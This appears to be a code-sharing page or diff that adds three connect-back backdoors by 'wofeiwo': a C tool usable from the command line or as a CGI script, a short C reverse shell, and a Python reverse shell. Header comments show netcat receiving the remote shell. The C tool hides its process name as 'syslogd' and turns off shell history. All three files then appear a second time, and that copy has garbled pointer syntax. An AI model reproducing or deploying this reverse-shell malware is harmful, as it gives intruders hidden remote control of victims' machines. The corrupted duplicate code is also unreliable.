wofeiwo · January 7, 2017 11:11
diff --git a/bk.c b/bk.c
 /*
 Connect back tools
 compile under linux
 2003-07-11 now support FreeBSD ..
 now support user define echo value
 [bkbll@mobile bkbll]$ uname -a
 Linux mobile 2.4.18-3custom #1 Èý 11ÔÂ 20 19:46:20 CST 2002 i686 unknown
 %uname -a
 FreeBSD 4.5-RELEASE FreeBSD 4.5-RELEASE #0: Mon Jan 28 14:31:56 GMT 2002 [email protected]:/usr/src/sys/compile/GENERIC i386
 [bkbll@mobile ownprog]$ ./cntoltty 192.168.8.110 5555
 Connect back tools bye bkbll([email protected])
 http://www.cnhonker.net
 Trying 192.168.8.110:5555....ok
 pid 3304 will manage our request
 on the 192.168.8.110:
 d:\>nc -l -p 5555
 sh-2.05b$ 
 this tool support CGI URL:
 such as:
 [bkbll@mobile ownprog]$ lynx http://192.168.8.114/cgi-bin/bkbll/....168.8.110:5555
 then on 192.168.8.110:
 d:\>nc -l -p 5555
 sh-2.05b$ id
 uid=48(apache) gid=48(apache) groups=48(apache)
 sh-2.05b$

 */
 #include <stdlib.h>
 #include <netdb.h>
 #include <string.h>
 #include <unistd.h>
 #include <stdio.h>
 #include <errno.h>
 #include <pwd.h>
 #include <fcntl.h>
 #include <signal.h>
 #include <termios.h>
 #include <sys/types.h>
 #include <sys/socket.h>
 #include <sys/wait.h>
 #include <sys/resource.h>
 #include <netinet/in.h>
 #include <arpa/inet.h>
 #ifndef BSD
 #define TIOCSCTTY 0x540E
 #define TIOCSPGRP 0x5410
 #endif
 #define TCSETA 0x5406
 #define MAXSIZE 512
 #define HOST_NAME_LENGTH 40
 #define ENV_SIZE 2000
 #define COMM_MASQ "syslogd -m 1 "
 #define MAX(a,b) a>b?a:b

 #define SUSP_KEY 0x1A
 #define INTR_KEY 0x03
 #define QUIT_KEY 0x1C
 #define VEOF_KEY 0x04

 #define VERSION "1.0"

 extern int errno;
 int have_pt_head=0,cgicn=0,not_execu=1,ifecho=0;
 char prompt[1]="$";
 struct termios parentterm;
 char *argenv_t[]={
 "HOSTNAME=mobile",
 "LANG=en_US",
 "LESSOPEN=|/usr/bin/lesspipe.sh %s",
 "USER=apache",
 "LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:",
 "INPUTRC=/etc/inputrc",
 "LOGNAME=apache",
 "SHLVL=1",
 "SHELL=/bin/sh",
 "HISTSIZE=0",
 "TERM=xterm",
 "PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/usr/sbin:/sbin"
 };

 int commonexec(int fd,char *argenv[]);
 int usetty(int *pty,int *tty,char *ttyname);
 int client_connect(int sockfd,char* server,int port);
 void exec_command(int);
 void print_ver();
 void pt_head();
 void pt_htmlhead();
 void pt_htmlend();

 main(int argc,char *argv[],char **env)
 {
 int target_port,clisocket;
 unsigned int a,b,c;
 struct sockaddr_in client;
 struct hostent *host;
 int pid;
 char action[31],target_host[20];
 char *p;

 if((argc>2) || (getenv("REQUEST_METHOD")==NULL))
 { /* not cgi connect */

 print_ver("");
 if(argc<3){printf("Usage:%s <host> <port> [-e]\r\n",argv[0]);exit(0);}
 target_port=atoi(argv[2]);
 cgicn=0;
 if ((argc > 3) && (strcmp("-e",argv[3])==0))
 ifecho=1;
 }
 else
 {
 pt_head();
 pt_htmlhead();
 print_ver("<br>");
 if(strncasecmp(getenv("REQUEST_METHOD"),"get",3)!=0)
 {
 printf("Only support get REQUEST_METHOD\r\n");
 pt_htmlend();
 }
 //memcpy(user_from_ip,getenv("REMOTE_ADDR"),15);
 memcpy(action,getenv("QUERY_STRING"),30);
 a=(unsigned int)action;
 if(index(action,':')==NULL) {printf("syntax error,for example:http://xxx.com/cgi-bin/cnto?192.168.7.110:53:-e\r\n");pt_htmlend();}
 b=(unsigned int)index(action,':');
 c=(b-a)>19?19:(b-a);
 memcpy(target_host,action,c);
 target_host[c]=0; // get the host
 target_port=atoi((char *)b+1); //get the port
 //have the -e value?
 //printf("the string:%s<br>\r\n",(char*)(b+1));
 if((p=rindex(action,':'))!=NULL)
 {
 //printf("after cmp:%s<br>\r\n",p+1);
 if(strcmp(p+1,"-e")==0) ifecho=1;
 }

 cgicn=1;
 }
 /* creat socket to other host */
 if((clisocket=socket(AF_INET,SOCK_STREAM,0))<0) {perror("creat socket error");}
 //printf("cgicn=%d,Trying connect \r\n",cgicn);
 if(cgicn)
 {
 if(client_connect(clisocket,(char *)target_host,target_port)<0){pt_htmlend();close(clisocket);exit(0);}
 }
 else
 {
 if(client_connect(clisocket,(char *)argv[1],target_port)<0){close(clisocket);exit(0);}
 }
 memcpy(argv[0],COMM_MASQ,sizeof(COMM_MASQ));
 signal(SIGCHLD,SIG_IGN);
 tcgetattr(2,&parentterm);
 pid = fork();
 if (pid !=0 )
 {
 if(cgicn)
 printf("<br>\r\n");
 if(ifecho ==1 )
 printf("Open echo on tty\r\n");
 else
 {
 printf("Close echo on tty\r\n");
 }
 if(cgicn)
 printf("<br>\r\n");
 printf("pid %d will manage our request\r\n", pid);
 //wait(NULL);
 if(cgicn)
 pt_htmlend();
 exit(0);
 }
 exec_command(clisocket);
 write(clisocket,"See u again\r\n",13);
 close(clisocket);

 }



 void exec_command(int fd)
 {

 int pid,pid2,i,pty,tty,read1,read2;
 char host_name[HOST_NAME_LENGTH],tmpbuf[MAXSIZE],buffer1[MAXSIZE],buffer2[MAXSIZE];
 struct passwd *user_info;
 fd_set readfd;
 struct termios oldterm,newterm;
 char ttyname[20];


 if(usetty(&pty,&tty,ttyname)<0)
 {
 printf("Cannot fork tty\r\n");
 commonexec(fd,argenv_t);
 return;
 }
 //setsid();
 pid=fork();
 if(pid==0)
 {

 setsid();
 tty=open(ttyname,O_RDWR);
 ioctl(tty, TIOCSCTTY);
 //tcsetattr(tty,TCSANOW,&parentterm);
 pid=getpid();
 ioctl (tty, TIOCSPGRP, &pid);
 tcgetattr(tty,&oldterm);
 if(ifecho == 0)
 {
 newterm = oldterm;
 newterm.c_lflag &= ~(ICANON | ECHO | ISIG |IEXTEN );
 tcsetattr(tty,TCSANOW,&newterm);
 }
 else
 {
 newterm = oldterm;
 newterm.c_lflag |= ICANON | ISIG | IEXTEN ;
 tcsetattr(tty,TCSANOW,&newterm);
 }

 /* close local part of connection */
 close(fd);
 signal(SIGHUP, SIG_DFL);
 signal(SIGCHLD, SIG_DFL);
 //dup2(fd,tty);
 dup2(tty, 0);
 dup2(tty, 1);
 dup2(tty, 2);
 close(tty);
 close(pty);
 if(cgicn)
 execle("/bin/sh","sh","-ip",NULL,argenv_t);
 else
 execl("/bin/sh","sh","-ip",NULL);
 }
 #ifndef BSD
 close(tty);
 #endif
 memset(buffer1,0,MAXSIZE);
 memset(buffer2,0,MAXSIZE);
 //write(pty,"alias ls='ls --color'\r\n",strlen("alias ls='ls --color'\r\n"));

 while (1) 
 {
 /* watch tty and client side */
 FD_ZERO(&readfd);
 FD_SET(pty, &readfd);
 FD_SET(fd, &readfd);
 if (select(MAX(fd,pty)+1,&readfd, NULL, NULL, NULL) < 0)break;
 if (FD_ISSET(pty, &readfd)) 
 {

 read1 = read(pty, buffer1, MAXSIZE);
 if (read1 <= 0) break;
 if (write(fd, buffer1, read1) <= 0) break;
 memset(buffer1,0,MAXSIZE);
 }
 if (FD_ISSET(fd, &readfd)) 
 {
 read2 = read(fd, buffer2, MAXSIZE); 
 if (read2 <= 0) break;
 if (write(pty, buffer2, read2) <= 0) break;
 memset(buffer2,0,MAXSIZE);
 }
 }
 #ifdef BSD
 close(tty);
 #endif 
 close(pty);
 return;
 }

 void print_ver(char *tags)
 {
 printf("Connect back tools(%s) bye bkbll([email protected])%s\r\n",VERSION,tags);
 printf("http://www.cnhonker.net%s%s\r\n\r\n",tags,tags);
 }

 int client_connect(int sockfd,char* server,int port)
 {
 struct sockaddr_in cliaddr;
 struct hostent *host;

 if((host=gethostbyname(server))==NULL)
 {
 printf("gethostbyname(%s) error\n",server);
 return(-1);
 } 

 bzero(&cliaddr,sizeof(struct sockaddr));
 cliaddr.sin_family=AF_INET;
 cliaddr.sin_port=htons(port);
 cliaddr.sin_addr=*((struct in_addr *)host->h_addr);
 printf("Trying %s:%d....",server,port);
 fflush(stdout);
 if(connect(sockfd,(struct sockaddr *)&cliaddr,sizeof(struct sockaddr))<0)
 {
 printf("error:%s\r\n",strerror(errno));
 return(-1);
 }
 printf("ok\r\n");
 return(0);
 }
 int usetty(int *pty,int *tty,char *ttyname)
 {
 char series[] = "pqrstuwxyzabcde";
 char subs[] = "0123456789abcdef";
 char ptynm[]="/dev/pty";
 char ttynm[]="/dev/tty";
 int i,j,slen,sublen,a;
 char ptyname[20];
 strcpy(ptyname,ptynm);
 strcpy(ttyname,ttynm);
 a=strlen(ptynm);
 sublen=strlen(subs);
 slen=strlen(series);
 //printf("fork tty...\r\n");
 //a=sublen=strlen(ttynm);
 for(i=0;i<slen;i++)
 {
 //printf("fork tty...\r\n");
 for(j=0;j<sublen;j++)
 {
 ttyname[a]=ptyname[a]=series[i];
 ttyname[a+1]=ptyname[a+1]=subs[j];
 ttyname[a+2]=ptyname[a+2]=0;
 #ifdef DEBUG 
 printf("check pty:%s........",ptyname);
 fflush(stdout);
 #endif
 *pty=open(ptyname,O_RDWR);
 if(*pty<0)
 {
 #ifdef DEBUG 
 printf("failed\r\n");
 #endif
 continue;
 }
 #ifdef sun 
 else
 {
 int pgrp_rtn;
 if (ioctl(*pty, TIOCGPGRP, &pgrp_rtn) == 0 || errno != EIO)
 { 
 close(*pty);
 #ifdef DEBUG 
 printf("failed\r\n");
 #endif
 continue;
 }
 }
 #endif 

 #ifdef DEBUG 
 printf("open it\r\n");
 printf("check tty:%s........",ttyname);
 fflush(stdout);
 #endif 
 *tty=open(ttyname,O_RDWR);
 if(*tty<0)
 {
 #ifdef DEBUG 
 printf("failed\r\n");
 #endif 
 continue;
 }
 #ifdef DEBUG 
 printf("open it\r\n");
 #endif 
 return(0);
 }
 } 
 return(-1); 
 }

 int commonexec(int fd,char *argenv[])
 {
 int result,read1,need_exec,pid;
 fd_set readfd;
 char read_in[MAXSIZE],exec_result[MAXSIZE];

 if(write(fd,prompt,1)<1){printf("write to client error;%s\r\n",strerror(errno));}
 while(1)
 {
 FD_ZERO(&readfd);
 FD_SET(fd,&readfd);

 need_exec=1; 
 result=select(fd+1,&readfd,NULL,NULL,NULL);
 if(result<0){printf("select error\r\n");return;}
 if(FD_ISSET(fd,&readfd))
 {
 read1=read(fd,read_in,MAXSIZE); 
 if(read1<=0)return;
 /* fork a child to exec the command */
 //printf("read_in=%s<br>\r\n",read_in);
 if(memcmp(read_in,"exit",4)==0){break;}
 pid=fork();
 if(pid==0) //child process
 {
 dup2(fd,0);
 dup2(fd,1);
 dup2(fd,2);
 execle("/bin/sh","/bin/sh","-c",read_in,NULL,argenv);
 }
 waitpid(pid,NULL,0);
 memset(read_in,0,MAXSIZE);
 if(write(fd,prompt,1)<1){perror("write to client error");}
 }

 }
 return(0);
 }

 void pt_head()
 {
 if(have_pt_head==0)
 {
 printf("Content-type:text/html\r\n\r\n");
 have_pt_head=1; 
 }
 }

 void pt_htmlhead()
 {
 printf("<html>\r\n");
 printf("<head>\r\n");
 printf("<title>cgi connect back</title>\r\n");
 printf("</head>\r\n");
 printf("<body>\r\n");
 }

 void pt_htmlend()
 {
 printf("</body>\r\n");
 printf("</html>\r\n");
 exit(1);
 }
diff --git a/cb.c b/cb.c
 /*
 *******************************************************
 ** Connect_Back Backdoor
 ** Modified by wofeiwo <wofeiwo[0x40]gmail[0x2E]com>
 ** Date: Jun 14th 2006
 *******************************************************
 */

 #include <stdio.h>
 #include <sys/types.h>
 #include <sys/socket.h>
 #include <unistd.h>
 #include <fcntl.h>
 #include <netinet/in.h>
 #include <netdb.h>

 void usage();
 char shell[]="/bin/bash";
 char message[]="-------------------[ Welcome to shell ]------------------\n"
 				"----------------------[ Enjoy it :) ]--------------------\n";  
 int sock;
 int main(int argc, char *argv[])
 {
 	if(argc <3)
 	{
 		usage(argv[0]);
 	}

 	struct sockaddr_in server;
 	if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) 
 	{
 		printf("[-] Couldn't make socket!\n");   
 		exit(-1);
 	}

 	server.sin_family = AF_INET;
 	server.sin_port = htons(atoi(argv[2]));
 	server.sin_addr.s_addr = inet_addr(argv[1]);

 	if(connect(sock, (struct sockaddr *)&server, sizeof(struct sockaddr)) == -1)
 	{
 		printf("[-] Could not connect to remote shell!\n");
 		exit(-1);
 	}
 	send(sock, message, sizeof(message), 0);
 	dup2(sock, 0);
 	dup2(sock, 1);
 	dup2(sock, 2);
 	execl(shell,"/bin/bash",(char *)0);
 	close(sock);
 	return 1;
 }

 void usage(char *pname[]) 
 {
    printf("Connect back door\n\n");
 	printf("Auther: wofeiwo <wofeiwo[0x40]gmail[0x2e]com>\n");
 	printf("Date: Jun 15th 2006\n\n");
 	printf("Usage: %s <reflect ip> <port>\n\n", pname);
 	exit(-1);
 }
diff --git a/cb.py b/cb.py
 #!/usr/bin/env python
 #coding=utf-8
 # Python Connect-back Backdoor
 # Author: [email protected]
 # Version: 1.1
 # Date: July 15th 2006
 # Last Modified: August 17th 2009

 import sys
 import os
 import pty
 import socket
 shell = "/bin/bash"

 def usage(programname):
    print "Python Connect-back Backdoor"
    print "Date: August 17th 2009\n"
    print "Usage: %s <conn_back_host> <port>\n" % programname
    
 def main():
    if len(sys.argv) != 3: 
        usage(sys.argv[0])
        sys.exit(1)

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:                                                                                        
        s.connect((socket.gethostbyname(sys.argv[1]),int(sys.argv[2])))
        print "[+] Connect ok." 
    except:                                                                                         
        print "[-] Could not connect to %s:%s" % (sys.argv[1], sys.argv[2])                                               
        sys.exit(2)
    s.send("-------------------- Python Connect-back Backdoor --------------------\n")
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    global shell
    pty.spawn(shell)
    print "See U!"
    s.close()

 if __name__ == "__main__": main()
	/*
	Connect back tools
	compile under linux
	2003-07-11 now support FreeBSD ..
	now support user define echo value
	[bkbll@mobile bkbll]$ uname -a
	Linux mobile 2.4.18-3custom #1 Èý 11ÔÂ 20 19:46:20 CST 2002 i686 unknown
	%uname -a
	FreeBSD 4.5-RELEASE FreeBSD 4.5-RELEASE #0: Mon Jan 28 14:31:56 GMT 2002 [email protected]:/usr/src/sys/compile/GENERIC i386
	[bkbll@mobile ownprog]$ ./cntoltty 192.168.8.110 5555
	Connect back tools bye bkbll([email protected])
	http://www.cnhonker.net
	Trying 192.168.8.110:5555....ok
	pid 3304 will manage our request
	on the 192.168.8.110:
	d:\>nc -l -p 5555
	sh-2.05b$
	this tool support CGI URL:
	such as:
	[bkbll@mobile ownprog]$ lynx http://192.168.8.114/cgi-bin/bkbll/....168.8.110:5555
	then on 192.168.8.110:
	d:\>nc -l -p 5555
	sh-2.05b$ id
	uid=48(apache) gid=48(apache) groups=48(apache)
	sh-2.05b$

	*/
	#include <stdlib.h>
	#include <netdb.h>
	#include <string.h>
	#include <unistd.h>
	#include <stdio.h>
	#include <errno.h>
	#include <pwd.h>
	#include <fcntl.h>
	#include <signal.h>
	#include <termios.h>
	#include <sys/types.h>
	#include <sys/socket.h>
	#include <sys/wait.h>
	#include <sys/resource.h>
	#include <netinet/in.h>
	#include <arpa/inet.h>
	#ifndef BSD
	#define TIOCSCTTY 0x540E
	#define TIOCSPGRP 0x5410
	#endif
	#define TCSETA 0x5406
	#define MAXSIZE 512
	#define HOST_NAME_LENGTH 40
	#define ENV_SIZE 2000
	#define COMM_MASQ "syslogd -m 1 "
	#define MAX(a,b) a>b?a:b

	#define SUSP_KEY 0x1A
	#define INTR_KEY 0x03
	#define QUIT_KEY 0x1C
	#define VEOF_KEY 0x04

	#define VERSION "1.0"

	extern int errno;
	int have_pt_head=0,cgicn=0,not_execu=1,ifecho=0;
	char prompt[1]="$";
	struct termios parentterm;
	char *argenv_t[]={
	"HOSTNAME=mobile",
	"LANG=en_US",
	"LESSOPEN=\|/usr/bin/lesspipe.sh %s",
	"USER=apache",
	"LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:",
	"INPUTRC=/etc/inputrc",
	"LOGNAME=apache",
	"SHLVL=1",
	"SHELL=/bin/sh",
	"HISTSIZE=0",
	"TERM=xterm",
	"PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/usr/sbin:/sbin"
	};

	int commonexec(int fd,char *argenv[]);
	int usetty(int pty,int tty,char *ttyname);
	int client_connect(int sockfd,char* server,int port);
	void exec_command(int);
	void print_ver();
	void pt_head();
	void pt_htmlhead();
	void pt_htmlend();

	main(int argc,char argv[],char *env)
	{
	int target_port,clisocket;
	unsigned int a,b,c;
	struct sockaddr_in client;
	struct hostent *host;
	int pid;
	char action[31],target_host[20];
	char *p;

	if((argc>2) \|\| (getenv("REQUEST_METHOD")==NULL))
	{ /* not cgi connect */

	print_ver("");
	if(argc<3){printf("Usage:%s <host> <port> [-e]\r\n",argv[0]);exit(0);}
	target_port=atoi(argv[2]);
	cgicn=0;
	if ((argc > 3) && (strcmp("-e",argv[3])==0))
	ifecho=1;
	}
	else
	{
	pt_head();
	pt_htmlhead();
	print_ver("<br>");
	if(strncasecmp(getenv("REQUEST_METHOD"),"get",3)!=0)
	{
	printf("Only support get REQUEST_METHOD\r\n");
	pt_htmlend();
	}
	//memcpy(user_from_ip,getenv("REMOTE_ADDR"),15);
	memcpy(action,getenv("QUERY_STRING"),30);
	a=(unsigned int)action;
	if(index(action,':')==NULL) {printf("syntax error,for example:http://xxx.com/cgi-bin/cnto?192.168.7.110:53:-e\r\n");pt_htmlend();}
	b=(unsigned int)index(action,':');
	c=(b-a)>19?19:(b-a);
	memcpy(target_host,action,c);
	target_host[c]=0; // get the host
	target_port=atoi((char *)b+1); //get the port
	//have the -e value?
	//printf("the string:%s<br>\r\n",(char*)(b+1));
	if((p=rindex(action,':'))!=NULL)
	{
	//printf("after cmp:%s<br>\r\n",p+1);
	if(strcmp(p+1,"-e")==0) ifecho=1;
	}

	cgicn=1;
	}
	/* creat socket to other host */
	if((clisocket=socket(AF_INET,SOCK_STREAM,0))<0) {perror("creat socket error");}
	//printf("cgicn=%d,Trying connect \r\n",cgicn);
	if(cgicn)
	{
	if(client_connect(clisocket,(char *)target_host,target_port)<0){pt_htmlend();close(clisocket);exit(0);}
	}
	else
	{
	if(client_connect(clisocket,(char *)argv[1],target_port)<0){close(clisocket);exit(0);}
	}
	memcpy(argv[0],COMM_MASQ,sizeof(COMM_MASQ));
	signal(SIGCHLD,SIG_IGN);
	tcgetattr(2,&parentterm);
	pid = fork();
	if (pid !=0 )
	{
	if(cgicn)
	printf("<br>\r\n");
	if(ifecho ==1 )
	printf("Open echo on tty\r\n");
	else
	{
	printf("Close echo on tty\r\n");
	}
	if(cgicn)
	printf("<br>\r\n");
	printf("pid %d will manage our request\r\n", pid);
	//wait(NULL);
	if(cgicn)
	pt_htmlend();
	exit(0);
	}
	exec_command(clisocket);
	write(clisocket,"See u again\r\n",13);
	close(clisocket);

	}



	void exec_command(int fd)
	{

	int pid,pid2,i,pty,tty,read1,read2;
	char host_name[HOST_NAME_LENGTH],tmpbuf[MAXSIZE],buffer1[MAXSIZE],buffer2[MAXSIZE];
	struct passwd *user_info;
	fd_set readfd;
	struct termios oldterm,newterm;
	char ttyname[20];


	if(usetty(&pty,&tty,ttyname)<0)
	{
	printf("Cannot fork tty\r\n");
	commonexec(fd,argenv_t);
	return;
	}
	//setsid();
	pid=fork();
	if(pid==0)
	{

	setsid();
	tty=open(ttyname,O_RDWR);
	ioctl(tty, TIOCSCTTY);
	//tcsetattr(tty,TCSANOW,&parentterm);
	pid=getpid();
	ioctl (tty, TIOCSPGRP, &pid);
	tcgetattr(tty,&oldterm);
	if(ifecho == 0)
	{
	newterm = oldterm;
	newterm.c_lflag &= ~(ICANON \| ECHO \| ISIG \|IEXTEN );
	tcsetattr(tty,TCSANOW,&newterm);
	}
	else
	{
	newterm = oldterm;
	newterm.c_lflag \|= ICANON \| ISIG \| IEXTEN ;
	tcsetattr(tty,TCSANOW,&newterm);
	}

	/* close local part of connection */
	close(fd);
	signal(SIGHUP, SIG_DFL);
	signal(SIGCHLD, SIG_DFL);
	//dup2(fd,tty);
	dup2(tty, 0);
	dup2(tty, 1);
	dup2(tty, 2);
	close(tty);
	close(pty);
	if(cgicn)
	execle("/bin/sh","sh","-ip",NULL,argenv_t);
	else
	execl("/bin/sh","sh","-ip",NULL);
	}
	#ifndef BSD
	close(tty);
	#endif
	memset(buffer1,0,MAXSIZE);
	memset(buffer2,0,MAXSIZE);
	//write(pty,"alias ls='ls --color'\r\n",strlen("alias ls='ls --color'\r\n"));

	while (1)
	{
	/* watch tty and client side */
	FD_ZERO(&readfd);
	FD_SET(pty, &readfd);
	FD_SET(fd, &readfd);
	if (select(MAX(fd,pty)+1,&readfd, NULL, NULL, NULL) < 0)break;
	if (FD_ISSET(pty, &readfd))
	{

	read1 = read(pty, buffer1, MAXSIZE);
	if (read1 <= 0) break;
	if (write(fd, buffer1, read1) <= 0) break;
	memset(buffer1,0,MAXSIZE);
	}
	if (FD_ISSET(fd, &readfd))
	{
	read2 = read(fd, buffer2, MAXSIZE);
	if (read2 <= 0) break;
	if (write(pty, buffer2, read2) <= 0) break;
	memset(buffer2,0,MAXSIZE);
	}
	}
	#ifdef BSD
	close(tty);
	#endif
	close(pty);
	return;
	}

	void print_ver(char *tags)
	{
	printf("Connect back tools(%s) bye bkbll([email protected])%s\r\n",VERSION,tags);
	printf("http://www.cnhonker.net%s%s\r\n\r\n",tags,tags);
	}

	int client_connect(int sockfd,char* server,int port)
	{
	struct sockaddr_in cliaddr;
	struct hostent *host;

	if((host=gethostbyname(server))==NULL)
	{
	printf("gethostbyname(%s) error\n",server);
	return(-1);
	}

	bzero(&cliaddr,sizeof(struct sockaddr));
	cliaddr.sin_family=AF_INET;
	cliaddr.sin_port=htons(port);
	cliaddr.sin_addr=((struct in_addr )host->h_addr);
	printf("Trying %s:%d....",server,port);
	fflush(stdout);
	if(connect(sockfd,(struct sockaddr *)&cliaddr,sizeof(struct sockaddr))<0)
	{
	printf("error:%s\r\n",strerror(errno));
	return(-1);
	}
	printf("ok\r\n");
	return(0);
	}
	int usetty(int pty,int tty,char *ttyname)
	{
	char series[] = "pqrstuwxyzabcde";
	char subs[] = "0123456789abcdef";
	char ptynm[]="/dev/pty";
	char ttynm[]="/dev/tty";
	int i,j,slen,sublen,a;
	char ptyname[20];
	strcpy(ptyname,ptynm);
	strcpy(ttyname,ttynm);
	a=strlen(ptynm);
	sublen=strlen(subs);
	slen=strlen(series);
	//printf("fork tty...\r\n");
	//a=sublen=strlen(ttynm);
	for(i=0;i<slen;i++)
	{
	//printf("fork tty...\r\n");
	for(j=0;j<sublen;j++)
	{
	ttyname[a]=ptyname[a]=series[i];
	ttyname[a+1]=ptyname[a+1]=subs[j];
	ttyname[a+2]=ptyname[a+2]=0;
	#ifdef DEBUG
	printf("check pty:%s........",ptyname);
	fflush(stdout);
	#endif
	*pty=open(ptyname,O_RDWR);
	if(*pty<0)
	{
	#ifdef DEBUG
	printf("failed\r\n");
	#endif
	continue;
	}
	#ifdef sun
	else
	{
	int pgrp_rtn;
	if (ioctl(*pty, TIOCGPGRP, &pgrp_rtn) == 0 \|\| errno != EIO)
	{
	close(*pty);
	#ifdef DEBUG
	printf("failed\r\n");
	#endif
	continue;
	}
	}
	#endif

	#ifdef DEBUG
	printf("open it\r\n");
	printf("check tty:%s........",ttyname);
	fflush(stdout);
	#endif
	*tty=open(ttyname,O_RDWR);
	if(*tty<0)
	{
	#ifdef DEBUG
	printf("failed\r\n");
	#endif
	continue;
	}
	#ifdef DEBUG
	printf("open it\r\n");
	#endif
	return(0);
	}
	}
	return(-1);
	}

	int commonexec(int fd,char *argenv[])
	{
	int result,read1,need_exec,pid;
	fd_set readfd;
	char read_in[MAXSIZE],exec_result[MAXSIZE];

	if(write(fd,prompt,1)<1){printf("write to client error;%s\r\n",strerror(errno));}
	while(1)
	{
	FD_ZERO(&readfd);
	FD_SET(fd,&readfd);

	need_exec=1;
	result=select(fd+1,&readfd,NULL,NULL,NULL);
	if(result<0){printf("select error\r\n");return;}
	if(FD_ISSET(fd,&readfd))
	{
	read1=read(fd,read_in,MAXSIZE);
	if(read1<=0)return;
	/* fork a child to exec the command */
	//printf("read_in=%s<br>\r\n",read_in);
	if(memcmp(read_in,"exit",4)==0){break;}
	pid=fork();
	if(pid==0) //child process
	{
	dup2(fd,0);
	dup2(fd,1);
	dup2(fd,2);
	execle("/bin/sh","/bin/sh","-c",read_in,NULL,argenv);
	}
	waitpid(pid,NULL,0);
	memset(read_in,0,MAXSIZE);
	if(write(fd,prompt,1)<1){perror("write to client error");}
	}

	}
	return(0);
	}

	void pt_head()
	{
	if(have_pt_head==0)
	{
	printf("Content-type:text/html\r\n\r\n");
	have_pt_head=1;
	}
	}

	void pt_htmlhead()
	{
	printf("<html>\r\n");
	printf("<head>\r\n");
	printf("<title>cgi connect back</title>\r\n");
	printf("</head>\r\n");
	printf("<body>\r\n");
	}

	void pt_htmlend()
	{
	printf("</body>\r\n");
	printf("</html>\r\n");
	exit(1);
	}
	/*
	*******************************************************
	** Connect_Back Backdoor
	** Modified by wofeiwo <wofeiwo[0x40]gmail[0x2E]com>
	** Date: Jun 14th 2006
	*******************************************************
	*/

	#include <stdio.h>
	#include <sys/types.h>
	#include <sys/socket.h>
	#include <unistd.h>
	#include <fcntl.h>
	#include <netinet/in.h>
	#include <netdb.h>

	void usage();
	char shell[]="/bin/bash";
	char message[]="-------------------[ Welcome to shell ]------------------\n"
	"----------------------[ Enjoy it :) ]--------------------\n";
	int sock;
	int main(int argc, char *argv[])
	{
	if(argc <3)
	{
	usage(argv[0]);
	}

	struct sockaddr_in server;
	if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1)
	{
	printf("[-] Couldn't make socket!\n");
	exit(-1);
	}

	server.sin_family = AF_INET;
	server.sin_port = htons(atoi(argv[2]));
	server.sin_addr.s_addr = inet_addr(argv[1]);

	if(connect(sock, (struct sockaddr *)&server, sizeof(struct sockaddr)) == -1)
	{
	printf("[-] Could not connect to remote shell!\n");
	exit(-1);
	}
	send(sock, message, sizeof(message), 0);
	dup2(sock, 0);
	dup2(sock, 1);
	dup2(sock, 2);
	execl(shell,"/bin/bash",(char *)0);
	close(sock);
	return 1;
	}

	void usage(char *pname[])
	{
	printf("Connect back door\n\n");
	printf("Auther: wofeiwo <wofeiwo[0x40]gmail[0x2e]com>\n");
	printf("Date: Jun 15th 2006\n\n");
	printf("Usage: %s <reflect ip> <port>\n\n", pname);
	exit(-1);
	}
	#!/usr/bin/env python
	#coding=utf-8
	# Python Connect-back Backdoor
	# Author: [email protected]
	# Version: 1.1
	# Date: July 15th 2006
	# Last Modified: August 17th 2009

	import sys
	import os
	import pty
	import socket
	shell = "/bin/bash"

	def usage(programname):
	print "Python Connect-back Backdoor"
	print "Date: August 17th 2009\n"
	print "Usage: %s <conn_back_host> <port>\n" % programname

	def main():
	if len(sys.argv) != 3:
	usage(sys.argv[0])
	sys.exit(1)

	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	try:
	s.connect((socket.gethostbyname(sys.argv[1]),int(sys.argv[2])))
	print "[+] Connect ok."
	except:
	print "[-] Could not connect to %s:%s" % (sys.argv[1], sys.argv[2])
	sys.exit(2)
	s.send("-------------------- Python Connect-back Backdoor --------------------\n")
	os.dup2(s.fileno(), 0)
	os.dup2(s.fileno(), 1)
	os.dup2(s.fileno(), 2)
	global shell
	pty.spawn(shell)
	print "See U!"
	s.close()

	if __name__ == "__main__": main()